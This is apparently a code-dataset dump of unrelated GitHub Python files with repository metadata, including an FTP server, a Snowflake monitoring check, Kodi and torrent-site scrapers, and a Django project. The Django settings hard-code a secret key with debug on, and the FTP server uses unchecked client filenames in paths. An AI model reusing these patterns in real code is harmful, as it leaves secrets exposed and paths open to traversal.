the_list[i] = the_list[j]
the_list[j] = temp
# three functions that compare the values of given instance variables.
def compare_population(city1, city2):
return city1.pop > city2.pop
def compare_name(city1, city2):
return lower(city1.name) <= lower(city2.name)
def compare_latitude(city1, city2):
return city1.lat <= city2.lat
def quicksort(the_list, p, r, compare_func):
'''function that recursively sorts the list of cities if the length of the list is greater than 1'''
if p < r:
q = partition(the_list, p, r, compare_func)
quicksort(the_list, p, q-1, compare_func)
quicksort(the_list, q+1, r, compare_func)
def sort(the_list, compare_func):
'''a function that calls quicksort and gives it variables p and r'''
quicksort(the_list, 0, len(the_list)-1, compare_func)
| [
"noreply@github.com"
] | sdberthoud.noreply@github.com |
3428c594603a90805fd8a98ac2b11e759393237a | 54da96e9295035b894bbd6c4bea36357127c5c90 | /ftp-server/core/main.py | 8edcb4c0748738fda0771c0387b98d7c607a739b | [] | no_license | suxiangjun/select-ftpserver | 7adbe47d78cb584b7067de0e4dbc1484ec7dd5dc | ddf95b2b978909f73b04be96c0191c39c8e84ff8 | refs/heads/master | 2021-05-07T13:57:50.384156 | 2017-11-16T09:50:08 | 2017-11-16T09:50:08 | 109,794,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,345 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
__author = "susu"
import selectors, socket,json,shelve,os,sys,time,hashlib,logging
import queue
basedir=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
user_basedir=basedir+'/home/'
sys.path.append(basedir)
conn_dic={} #用于存放每个连接上传/下载的文件信息
class My_select(object):
user_now_dir="/"
def __init__(self):
self.sel=selectors.DefaultSelector()
self.d=queue.Queue()
def accept(self,sock,mask):
"接收客户端信息实例" #{q:[put,get] }
self.conn, self.addr = sock.accept()
# 用于存放用户上传文件/下载文件的临时数据
conn_dic[self.conn]=[{"filesize": 0,"file": queue.Queue(),"uploads":0},{"filesize": queue.Queue(), "file": queue.Queue()}]
self.conn.setblocking(False)
self.sel.register( self.conn, selectors.EVENT_READ, self.read) # 新连接注册read回调函数
def read(self,conn,mask):
"接收客户端的数据"
client_data =self.conn.recv(1024) # eg: '{"action": "get", "filename": "filename", "overridden": true}'
if conn_dic[self.conn][0]["uploads"]: # d 对列有数据代表传输过来的是用户上传的文件的数据,开始执行下载
q = queue.Queue()
# 获取put_dic
put_dic = conn_dic[self.conn][0]
if os.path.isfile(put_dic["file_dir"] + put_dic["filename"]):
f = open(put_dic["file_dir"] + put_dic["filename"] + ".new", "wb")
else:
f = open(put_dic["file_dir"] + put_dic["filename"], "wb")
received_size = len(client_data)
print(received_size)
f.write(client_data)
while received_size < put_dic["filesize"]:
data = self.conn.recv(1024)
f.write(data)
received_size += len(data)
else:
f.close()
conn_dic[self.conn][0]["uploads"] = 0 # 关闭上传模式
info = "file [%s] has uploaded..." % put_dic["filename"]
self.conn.send(info.encode())
self.log("成功上传{}文件".format(put_dic["filename"]))
else:
if client_data:
if client_data.decode().startswith("{"):
cmd_dic = json.loads(client_data.decode())
action = cmd_dic["action"]
if hasattr(self,action):
func = getattr(self,action)
func(cmd_dic)
elif client_data.decode().startswith("receive"):
self.conn.sendall(conn_dic[self.conn][1]["file"].get())
elif client_data.decode().startswith("uploads"):
conn_dic[self.conn][0]["uploads"]=1 # 激活上传模式
self.conn.send(b"ack")
else:
print("closing",conn)
self.sel.unregister(conn)
conn.close()
#查看文件
def ls(self, *args):
'''查看家目录文件'''
cmd_dic = args[0]
user_dir = user_basedir + self.user_now_dir
filenames = os.listdir(user_dir)
data = [[], []]
for i in filenames:
if os.path.isfile(user_dir + "/" + i):
data[1].append(i)
else:
data[0].append(i)
self.conn.send(str(data).encode())
#上传文件
def put(self,*args):
'''接收客户端文件'''
cmd_dic = args[0]
conn_dic[self.conn][0]["filename"]=cmd_dic["filename"]
conn_dic[self.conn][0]["filesize"]=cmd_dic["size"]
conn_dic[self.conn][0]["file_dir"]=user_basedir+self.user_now_dir+"/"
self.conn.send(b"200 ok")
#下载文件
def get(self,*args):
cmd_dic = args[0]
get_dic=conn_dic[self.conn][1]
filename = cmd_dic["filename"]
user_dir=user_basedir+self.user_now_dir+"/"
print("{0}下载文件:".format(self.addr[0]))
self.log("{}下载{}文件".format(self.addr[0], filename))
if os.path.isfile(user_dir + filename):
with open(user_dir+filename, "rb") as f:
file_size = os.stat(user_dir+filename).st_size
conn_dic[self.conn][1]["filesize"]=file_size
conn_dic[self.conn][1]["file"].put(f.read())
self.conn.send(str(file_size).encode())
else:
self.conn.send("n".encode())
#日志模块
@staticmethod
def log(info):
logging.basicConfig(filename=basedir + "/log/" + "ftp.log",
level=logging.INFO,
format='%(asctime)s %(message)s',
datefmt='%m/%d/%Y %H:%M:%S %p')
logging.info(info)
def run(self):
server = socket.socket()
server.bind(('localhost', 9999))
server.listen(500)
server.setblocking(False)
self.sel.register(server, selectors.EVENT_READ, self.accept) # 注册事件,只要来一个连接就调accept这个函数,
while True:
events = self.sel.select()
print("事件:",events)
for key, mask in events:
callback = key.data
callback(key.fileobj, mask)
f=My_select()
| [
"986109409@qq.com"
] | 986109409@qq.com |
66bb9aeae5ab3dde0c9d500676672ff6edc506f4 | 80ab3312d7bbe514d1e7b3452fdd9c25d542f079 | /oops/overriding.py | 3b411b7f2fef66fc30a35faf8d9f4ec6f97ef139 | [] | no_license | krishnanandk/kkprojects | 2e7e993475b10696b05873a15df997ddf46931a1 | dd5d96ad7af9f8632648e833fcae87951ca431de | refs/heads/master | 2023-04-09T04:08:23.077215 | 2021-04-19T04:56:11 | 2021-04-19T04:56:11 | 359,332,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | class Books:
def count(self):
print("10000 thousand books")
def authorname(self):
print("MT Vasudevan Nair")
class Novel(Books):
def authorname(self):
print("Vaikkom Muhammed Basheer")
obj=Novel()
obj.authorname() | [
"krishnanandk264@gmail.com"
] | krishnanandk264@gmail.com |
4c4a1bf67de7fa2a59a078835fd7716c06180b88 | f6bdf02ba4c3fbfe7f4b697b23ee57e71d4157ab | /unpipelined.py | 27145430552455ac5c9dc7407d1a9d94b469e80d | [] | no_license | jaya2991/Nios2InstructionSetArchitecture | a51600f402bb0a8bec92997c2d151a35017ded86 | 310e7f95e9f8be8dbe26bea09dc745c26d43f39b | refs/heads/master | 2021-01-12T14:46:29.836079 | 2016-10-27T08:38:44 | 2016-10-27T08:38:44 | 72,085,405 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | #! /usr/bin/python
import sys
from stages import *
from registers import *
from memory import *
def main():
i = 0
j = 0
while (i < 5):
instruction = Stages_40.instr_fetch_40()
Stages_40.decode_instr_40(instruction)
Stages_40.execute_40(instruction)
Stages_40.memory_access_40(instruction)
Stages_40.write_back_40(instruction)
for (a, b) in Registers_40.nios_registers_40.iteritems():
print (a,b)
i = i + 1
while (j < 32):
instruction = Stages_40.instr_fetch_40()
Stages_40.decode_instr_40(instruction)
Stages_40.execute_40(instruction)
Stages_40.memory_access_40(instruction)
Stages_40.write_back_40(instruction)
for (a, b) in Registers_40.nios_registers_40.iteritems():
print (a,b)
j = j + 1
instruction = Stages_40.instr_fetch_40()
Stages_40.decode_instr_40(instruction)
Stages_40.execute_40(instruction)
Stages_40.memory_access_40(instruction)
Stages_40.write_back_40(instruction)
for (a, b) in Registers_40.nios_registers_40.iteritems():
print (a,b)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | jaya2991.noreply@github.com |
191c990010ee96e42377d1326870b184f985478c | adce23a96e95337e81b062fccbcd8c77729bfd7e | /snowflake/datadog_checks/snowflake/check.py | 49e0204ef67e881eda954fd2f5952813946b461c | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | therc/integrations-core | fa17ff539ba65b1e27c63717dd64598cbb13e218 | a849833bf919f12e1cac384603a6611c97f93538 | refs/heads/master | 2021-06-25T03:50:41.402313 | 2021-02-08T14:53:07 | 2021-02-08T14:53:07 | 202,616,355 | 0 | 0 | BSD-3-Clause | 2019-08-15T21:53:49 | 2019-08-15T21:53:49 | null | UTF-8 | Python | false | false | 6,032 | py | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from contextlib import closing
import snowflake.connector as sf
from datadog_checks.base import AgentCheck, ConfigurationError
from datadog_checks.base.utils.db import QueryManager
from . import queries
from .config import Config
METRIC_GROUPS = {
'snowflake.query': [queries.WarehouseLoad, queries.QueryHistory],
'snowflake.billing': [queries.CreditUsage, queries.WarehouseCreditUsage],
'snowflake.storage': [queries.StorageUsageMetrics],
'snowflake.storage.database': [queries.DatabaseStorageMetrics],
'snowflake.storage.table': [queries.TableStorage],
'snowflake.logins': [queries.LoginMetrics],
'snowflake.data_transfer': [queries.DataTransferHistory],
'snowflake.auto_recluster': [queries.AutoReclusterHistory],
'snowflake.pipe': [queries.PipeHistory],
'snowflake.replication': [queries.ReplicationUsage],
}
class SnowflakeCheck(AgentCheck):
"""
Collect Snowflake account usage metrics
"""
__NAMESPACE__ = 'snowflake'
SERVICE_CHECK_CONNECT = 'snowflake.can_connect'
def __init__(self, *args, **kwargs):
super(SnowflakeCheck, self).__init__(*args, **kwargs)
self.config = Config(self.instance)
self._conn = None
self.proxy_host = self.init_config.get('proxy_host', None)
self.proxy_port = self.init_config.get('proxy_port', None)
self.proxy_user = self.init_config.get('proxy_user', None)
self.proxy_password = self.init_config.get('proxy_password', None)
# Add default tags like account to all metrics
self._tags = self.config.tags + ['account:{}'.format(self.config.account)]
if self.config.password:
self.register_secret(self.config.password)
if self.config.role == 'ACCOUNTADMIN':
self.log.info(
'Snowflake `role` is set as `ACCOUNTADMIN` which should be used cautiously, '
'refer to docs about custom roles.'
)
self.metric_queries = []
self.errors = []
for mgroup in self.config.metric_groups:
try:
self.metric_queries.extend(METRIC_GROUPS[mgroup])
except KeyError:
self.errors.append(mgroup)
if self.errors:
self.log.warning('Invalid metric_groups found in snowflake conf.yaml: %s', (', '.join(self.errors)))
if not self.metric_queries:
raise ConfigurationError('No valid metric_groups configured, please list at least one.')
self._query_manager = QueryManager(self, self.execute_query_raw, queries=self.metric_queries, tags=self._tags)
self.check_initializations.append(self._query_manager.compile_queries)
def check(self, _):
self.connect()
if self._conn is not None:
# Execute queries
self._query_manager.execute()
self._collect_version()
self.log.debug("Closing connection to Snowflake...")
self._conn.close()
def execute_query_raw(self, query):
"""
Executes query with timestamp from parts if comparing start_time field.
"""
with closing(self._conn.cursor()) as cursor:
cursor.execute(query)
if cursor.rowcount is None or cursor.rowcount < 1:
self.log.debug("Failed to fetch records from query: `%s`", query)
return []
return cursor.fetchall()
def connect(self):
self.log.debug(
"Establishing a new connection to Snowflake: account=%s, user=%s, database=%s, schema=%s, warehouse=%s, "
"role=%s, timeout=%s, authenticator=%s, ocsp_response_cache_filename=%s, proxy_host=%s, proxy_port=%s",
self.config.account,
self.config.user,
self.config.database,
self.config.schema,
self.config.warehouse,
self.config.role,
self.config.login_timeout,
self.config.authenticator,
self.config.ocsp_response_cache_filename,
self.proxy_host,
self.proxy_port,
)
try:
conn = sf.connect(
user=self.config.user,
password=self.config.password,
account=self.config.account,
database=self.config.database,
schema=self.config.schema,
warehouse=self.config.warehouse,
role=self.config.role,
passcode_in_password=self.config.passcode_in_password,
passcode=self.config.passcode,
client_prefetch_threads=self.config.client_prefetch_threads,
login_timeout=self.config.login_timeout,
ocsp_response_cache_filename=self.config.ocsp_response_cache_filename,
authenticator=self.config.authenticator,
token=self.config.token,
client_session_keep_alive=self.config.client_keep_alive,
proxy_host=self.proxy_host,
proxy_port=self.proxy_port,
proxy_user=self.proxy_user,
proxy_password=self.proxy_password,
)
except Exception as e:
msg = "Unable to connect to Snowflake: {}".format(e)
self.service_check(self.SERVICE_CHECK_CONNECT, self.CRITICAL, message=msg, tags=self._tags)
self.warning(msg)
else:
self.service_check(self.SERVICE_CHECK_CONNECT, self.OK, tags=self._tags)
self._conn = conn
@AgentCheck.metadata_entrypoint
def _collect_version(self):
try:
raw_version = self.execute_query_raw("select current_version();")
version = raw_version[0][0]
except Exception as e:
self.log.error("Error collecting version for Snowflake: %s", e)
else:
if version:
self.set_metadata('version', version)
| [
"noreply@github.com"
] | therc.noreply@github.com |
dfe3d4a0d7a8e21bbbff025739f9b9b914cf880e | fc93b3817f1fb8bb6c5a37884790741d34ba1707 | /testdriver.py | 9dd79f9a4c96d89f09e00ec30e3423174d94ee16 | [] | no_license | GrahamOMalley/spiderBro | 107fb2d03a87a8a02607aad8cd8bb51befd6ab44 | 53379cc41128a714e30551fe946f587ad60e72c8 | refs/heads/master | 2020-04-26T02:53:40.981210 | 2015-05-11T10:19:33 | 2015-05-11T10:19:33 | 1,685,002 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,805 | py | #! /usr/bin/env python
#from sb_utils import *
import sys
import urllib2
if __name__ == "__main__":
"""
quick little testing script to see behaviour of search classes and test individual episodes/seasons
"""
# e_masks = [NxN, sNeN, NNN]
# s_masks = [season, series]
# search_list = [piratebaysearch, btjunkiesearch, isohuntsearch]
# tags = ["SWESUB", "SPANISH"]
# opts = {"use_debug_logging":True, "log_dir":"log"}
#log = get_sb_log(opts)
#base = base_search()
#base.search("Game of Thrones", "1", "3", sNeN, tags, True)
#p = piratebaysearch()
#result = p.search("Girls", "2", "2", sNeN, tags, True)
#if result: log.info("\t\tFound Torrent: %s" % result)
#i = isohuntsearch()
#result = i.search("The Office (US)", "8", "17", sNeN, tags, False)
#print e.search_url
#if result: log.info("\t\tFound Torrent: %s" % result)
#e = extratorrentsearch()
#result = e.search("The Office (US)", "8", "17", sNeN, tags, False)
#print e.search_url #if result: log.info("\t\tFound Torrent: %s" % result)
#proxy_support = urllib2.ProxyHandler({})
#opener = urllib2.build_opener(proxy_support)
#urllib2.install_opener(opener)
#response = urllib2.urlopen("http://extratorrent.cc/search/?search=downton+abbey&new=1&x=0&y=0")
request = urllib2.Request("https://kickass.unblocked.pw/usearch/marvels%20agents%20of%20S.H.I.E.L.D.%20s02e10/")
request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
request.add_header('User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0")
request.add_header('Accept-Language', "en-US,en;q=0.5")
response = urllib2.urlopen(request)
search_page = response.read()
print search_page
| [
"gomgomgom@gmail.com"
] | gomgomgom@gmail.com |
dc4f3f96ee63e46f710ab8d879f75b8de8298493 | 0912b90163930701f17c7cca214ffce2ad30c702 | /CRUD/urls.py | 2742d34b236d169aca2baab3c5c21b5cae04c3d4 | [] | no_license | Miskat-UL/django_model_CRUD | 967a8bb385ee4c77f59a02818b8cd4e355884e61 | 0babad284897d5dde1cf763c157fea42b1e5da69 | refs/heads/main | 2023-08-16T07:55:12.439289 | 2021-09-23T04:50:03 | 2021-09-23T04:50:03 | 409,300,389 | 4 | 1 | null | 2021-09-29T15:46:34 | 2021-09-22T17:42:09 | Python | UTF-8 | Python | false | false | 1,102 | py | """CRUD URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from main import views as main_views
from teachers import views as teacher_views
urlpatterns = [
path('admin/', admin.site.urls),
path('students/', main_views.home),
path('students/<str:edit>/<str:qs>', main_views.another),
path('<str:action>/<str:id>', main_views.action_handler),
path('teachers/', teacher_views.home),
path('teachers/<str:edit>/<str:qs>', teacher_views.another),
]
| [
"77013640+Miskat-UL@users.noreply.github.com"
] | 77013640+Miskat-UL@users.noreply.github.com |
379cfcb0a6591eec89be0d795db705d0ab5fd90d | b830f3d2b94aa3be76bfe6c7a8e72c37dc6dc316 | /nd_project_1_Q3.py | c695f1c4503bbff630a2b52a9d9fdf4a82c617c2 | [] | no_license | burnssa/nd_project_1 | 71f412843aee9899d6c914c506f507b09cb7beb5 | 012cabb863c680edef05d47caa95a63781b127ac | refs/heads/master | 2021-01-01T20:48:02.940610 | 2015-07-18T16:34:22 | 2015-07-18T16:34:22 | 38,554,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,763 | py |
import numpy as np
import pandas as pd
import ggplot
from ggplot import *
from pandas import *
import scipy.stats
import string
PATH_TO_CSV = "turnstile_weather_v2.csv"
def run_hourly_entry_chart(csv_path):
turnstile_data = pd.read_csv(csv_path)
#Create table melted with hourly entries as values on index of 'hour'
turnstile_data['hour_float'] = turnstile_data['hour'].astype(float)
turnstile_data['UNIT_float'] = turnstile_data['UNIT'].str.replace('R','').astype(float)
turnstile_data['entries_float'] = turnstile_data['ENTRIESn'].str.replace(',','').convert_objects(convert_numeric=True)
#Get an array of top 10 units of ENTRIESn
turnstile_data_unit = turnstile_data.groupby(['UNIT_float']).sum()
turnstile_data_sorted = turnstile_data_unit.sort(['entries_float'], ascending=[0]).reset_index()
top_10_units = turnstile_data_sorted['UNIT_float'].head(10)
print top_10_units
top_turnstile_data = turnstile_data[turnstile_data['UNIT_float'].isin(top_10_units)]
# top 10 UNITs by total entries
print top_turnstile_data
#put data on top 10 stations in a pviot table with columns indexed on hourly entries
hourly_table_df = pd.pivot_table(top_turnstile_data,index=['hour_float'], columns=['UNIT_float'], values=['ENTRIESn_hourly'],aggfunc=np.sum).reset_index(0)
hourly_graph = pd.melt(hourly_table_df, id_vars=['hour_float'])
print hourly_graph
#print graph
p = ggplot(hourly_graph, aes(x ='hour_float', y ='value', color='UNIT_float')) +\
geom_point(alpha = 0.9, size=40) +\
stat_smooth(colour='red', span=.6) +\
xlab("Hour of Day") +\
ylab("Hourly Entries for Preceding Four Hours") +\
ggtitle("Intra-day Entries at NYC's 10 Largest Subway Units") +\
xlim(0,20) +\
ylim(0,800000)
print p
run_hourly_entry_chart(PATH_TO_CSV)
| [
"scott@guidefinancial.com"
] | scott@guidefinancial.com |
44fdb2a4b0c790599b0870be6e31e8c7a7f83422 | a3ca523c6d2373f8db13be87ef7890d94409aa29 | /plugin.video.salts/scrapers/clickplay_scraper.py | d83d47505e549bbe80abdd5b797e844b1012679a | [] | no_license | kodicustomfx/install | 57d3c52103d723da1e003ce2f5a6fd188202f4d5 | 828383bf6b4933d3c2cd86d07e954e0d932ec400 | refs/heads/master | 2021-01-10T08:31:34.120840 | 2015-11-15T23:21:40 | 2015-11-15T23:21:40 | 46,240,544 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,484 | py | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urlparse
import xbmcaddon
import urllib
import base64
from salts_lib import dom_parser
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
BASE_URL = 'http://clickplay.to'
class ClickPlay_Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE])
@classmethod
def get_name(cls):
return 'clickplay.to'
def resolve_link(self, link):
return link
def format_source_label(self, item):
label = '[%s] %s ' % (item['quality'], item['host'])
return label
def get_sources(self, video):
source_url = self.get_url(video)
hosters = []
if source_url:
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=.5)
ele = dom_parser.parse_dom(html, 'video')
if ele:
stream_url = dom_parser.parse_dom(ele, 'source', ret='src')
if stream_url:
hoster = {'multi-part': False, 'url': stream_url[0], 'class': self, 'quality': QUALITIES.HD720, 'host': self._get_direct_hostname(stream_url[0]), 'rating': None, 'views': None, 'direct': True}
if hoster['host'] == 'gvideo':
hoster['quality'] = self._gv_get_quality(hoster['url'])
hosters.append(hoster)
sources = dom_parser.parse_dom(html, 'iframe', ret='src')
for src in sources:
if 'facebook' in src: continue
host = urlparse.urlparse(src).hostname
hoster = {'multi-part': False, 'url': src, 'class': self, 'quality': QUALITIES.HIGH, 'host': host, 'rating': None, 'views': None, 'direct': False}
hosters.append(hoster)
return hosters
def get_url(self, video):
return super(ClickPlay_Scraper, self)._default_get_url(video)
def _get_episode_url(self, show_url, video):
season_url = show_url + 'season-%d/' % (int(video.season))
episode_pattern = 'href="([^"]+/season-%d/episode-%d-[^"]+)' % (int(video.season), int(video.episode))
title_pattern = 'href="([^"]+)"\s+title="[^"]+/\s*([^"]+)'
return super(ClickPlay_Scraper, self)._default_get_episode_url(season_url, video, episode_pattern, title_pattern)
def search(self, video_type, title, year):
url = urlparse.urljoin(self.base_url, '/tv-series-a-z-list')
html = self._http_get(url, cache_limit=8)
results = []
pattern = '<li>\s*<a.*?href="([^"]+)[^>]*>([^<]+)'
norm_title = self._normalize_title(title)
for match in re.finditer(pattern, html, re.DOTALL):
url, match_title_year = match.groups()
r = re.search('(.*?)\s+\((\d{4})\)', match_title_year)
if r:
match_title, match_year = r.groups()
else:
match_title = match_title_year
match_year = ''
if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
result = {'url': url.replace(self.base_url, ''), 'title': match_title, 'year': match_year}
results.append(result)
return results
def _http_get(self, url, data=None, cache_limit=8):
return super(ClickPlay_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
| [
"jasonhogan11@yahoo.com"
] | jasonhogan11@yahoo.com |
0ff3565d487e9b1d1204420dc25fe29bc312d388 | cd317b0e4790a510f0829ca4f9bea6abe11fa621 | /learning_log/settings.py | ccb13d3896fef40f65159d65125e66e17fe716fc | [] | no_license | apracapinheiro/learning_log | 8f011c05bbdfc4355e28ee7194e42e01e36e8192 | 0a3fa5292290574fe456900e065c707a65b811f8 | refs/heads/master | 2020-12-24T08:39:46.562684 | 2016-11-08T20:36:46 | 2016-11-08T20:36:46 | 73,075,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,046 | py | # -*- coding: utf-8 -*-
"""
Django settings for learning_log project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=09u_t_+(+mvh^b5mju706l-x743hgrnv61gkihzt)e_w#^0r9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'learning_logs',
'users',
'bootstrap3',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'learning_log.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'learning_log/templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'learning_log.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Araguaina'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
# Minhas configurações
LOGIN_URL = '/users/login/'
# Configuracoes para django-bootstrap3
BOOTSTRAP3 = {
'include_jquery': True
}
# Configuracoes para o Heroku
if os.getcwd() == '/app':
import dj_database_url
DATABASES = {
'default': dj_database_url.config(default='postgres://localhost')
}
# honra o cabeçalho 'X-Forwarded-Proto' para request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# cabeçalhos para permitir todos os hosts
ALLOWED_HOSTS = ['learning-log-to.herokuapp.com']
DEBUG = False
# configuracao de recursos estáticos
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = 'staticfiles'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
) | [
"apracapinheiro@yahoo.com.br"
] | apracapinheiro@yahoo.com.br |
56b63747d8a1ab8c9763ce1c45c7f478922a8631 | dad2ceba093e8b298e01094f06441713e92c60c3 | /complex_word.py | 042c6b13780c2db27a2e871337a4e71cbe47a202 | [] | no_license | siangooding/lexical_simplification | c8376c10e9c0c31b53fe4a743c988ca7ae00c12a | b9193031f0768ad94cbe5b095e067532297f481b | refs/heads/master | 2023-05-28T14:17:27.726239 | 2022-08-03T15:29:43 | 2022-08-03T15:29:43 | 204,720,763 | 14 | 5 | null | 2023-05-22T21:14:20 | 2019-08-27T14:26:18 | Python | UTF-8 | Python | false | false | 2,118 | py |
import labeler
import experiment
import collections
import statistics
import pandas as pd
model_path = './gpu_attention.model'
model = labeler.SequenceLabeler.load(model_path)
config = model.config
predictions_cache = {}
id2label = collections.OrderedDict()
for label in model.label2id:
id2label[model.label2id[label]] = label
def get_complex_words(tokenised_string):
dataframe = pd.DataFrame()
dataframe['word'] = tokenised_string
dataframe['binary'] = 'N'
dataframe.to_csv('./'+'complex_word'+'.txt', sep = '\t',index=False, header=False, quotechar=' ')
sentences_test = experiment.read_input_files('./complex_word.txt')
batches_of_sentence_ids = experiment.create_batches_of_sentence_ids(sentences_test, config["batch_equal_size"], config['max_batch_size'])
for sentence_ids_in_batch in batches_of_sentence_ids:
batch = [sentences_test[i] for i in sentence_ids_in_batch]
cost, predicted_labels, predicted_probs = model.process_batch(batch, is_training=False, learningrate=0.0)
try:
assert(len(sentence_ids_in_batch) == len(predicted_labels))
except:
print('cw error')
prob_labels = predicted_probs[0]
probability_list = []
for prob_pair in prob_labels:
probability_list.append(prob_pair[1])
return probability_list
def get_complexities(indexes, tokenized_sentence):
probabilities = get_complex_words(tokenized_sentence)
word_probs = [probabilities[each_index] for each_index in indexes]
return float(sum(word_probs))/len(word_probs)
def get_synonym_complexities(synonyms, tokenized, index):
word_complexities = []
for entry in synonyms:
#index list for multi word replacements
indexes = []
#create copy of original token list
tokenized_sentence = tokenized.copy()
del tokenized_sentence[index]
#if synonym contains multiple words we calculate average complexity of words
for i,word in enumerate(entry):
#insert words
tokenized_sentence.insert((index + i), word)
#append new indexes
indexes.append(index+i)
prob = get_complexities(indexes, tokenized_sentence)
word_complexities.append(prob)
return word_complexities
| [
"siangooding@gmail.com"
] | siangooding@gmail.com |
8d6b1d08cd2bb5f1c6be4d81267ae68fd6dfc6ee | a575970d98fbd27846c15a220444b33a59ce1958 | /api/urls.py | aa41e4b8b693b9ee019fdac973ecf2fe6a4bf314 | [] | no_license | githubbinu/Django-todo-api | 44d4bf2bbe0c439b88141eee53fc3a2c1a610b6c | af8e47a6ad099950639088664b19217941f2c051 | refs/heads/main | 2023-09-01T00:33:13.431632 | 2021-10-08T13:38:16 | 2021-10-08T13:38:16 | 413,303,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | from django.urls import path
from . import views
urlpatterns=[
path('',views.getNotes),
path('notes/',views.getNotes),
path('notes/create/',views.creatNote),
path('notes/update/<str:pk>',views.updateNote),
path('notes/<str:pk>/',views.getNote),
path('notes/delete/<str:pk>',views.deleteNote),
] | [
"binuisi2020@gmail.com"
] | binuisi2020@gmail.com |
ed88e447bd54658054b3ff833e6c554baa76ec5f | d48dc8511ff830fb9e0378b7ab5ada1e6d0c48b0 | /env/bin/futurize | e92db88d8b208ef620252944718efb8b67afcf5f | [
"MIT"
